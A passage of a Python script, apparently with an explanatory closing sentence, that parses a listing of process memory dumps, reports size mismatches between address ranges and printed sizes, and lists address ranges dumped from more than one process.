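            name, pid, seq, start, end, num, unit = m.groups()
            dumps.append(Dump(name, int(pid), int(seq), "memory",
                              int(start, 16), int(end, 16), num + unit))
            continue
        m = MAPPING_RE.search(line)
        if m:
            name, pid, seq = m.groups()
            dumps.append(Dump(name, int(pid), int(seq), "mapping", None, None, None))
    return dumps


def check_sizes(dumps: List[Dump]) -> List[Tuple[str, str, str]]:
    """(name, size implied by the address range, size printed) for entries that disagree."""
    bad = []
    for d in dumps:
        if d.kind != "memory":
            continue
        implied = format_size(d.end - d.start)
        if implied != d.reported:
            bad.append((d.name, implied, d.reported))
    return bad


def shared_ranges(dumps: List[Dump]) -> Dict[Tuple[int, int], List[int]]:
    """Address ranges that were dumped from more than one PID, with the PIDs sorted."""
    seen = defaultdict(set)
    for d in dumps:
        if d.kind == "memory":
            seen[(d.start, d.end)].add(d.pid)
    return {rng: sorted(pids) for rng, pids in seen.items() if len(pids) > 1}


if __name__ == "__main__":
    parsed = parse_dump_listing(SAMPLE_LISTING)
    print(f"{len(parsed)} entries")
    for name, implied, printed in check_sizes(parsed):
        print(f"size mismatch: {name} range says {implied}, report says {printed}")
    for (start, end), pids in shared_ranges(parsed).items():
        print(f"0x{start:016X}-0x{end:016X} dumped from PIDs {pids}")
```

Feed `parse_dump_listing` the whole listing to get the full per-PID picture; on the excerpt, the only mismatch is the constructed PID 9999 line, and the one shared range is the 9.9MB region at 0x000007FEF4EE0000.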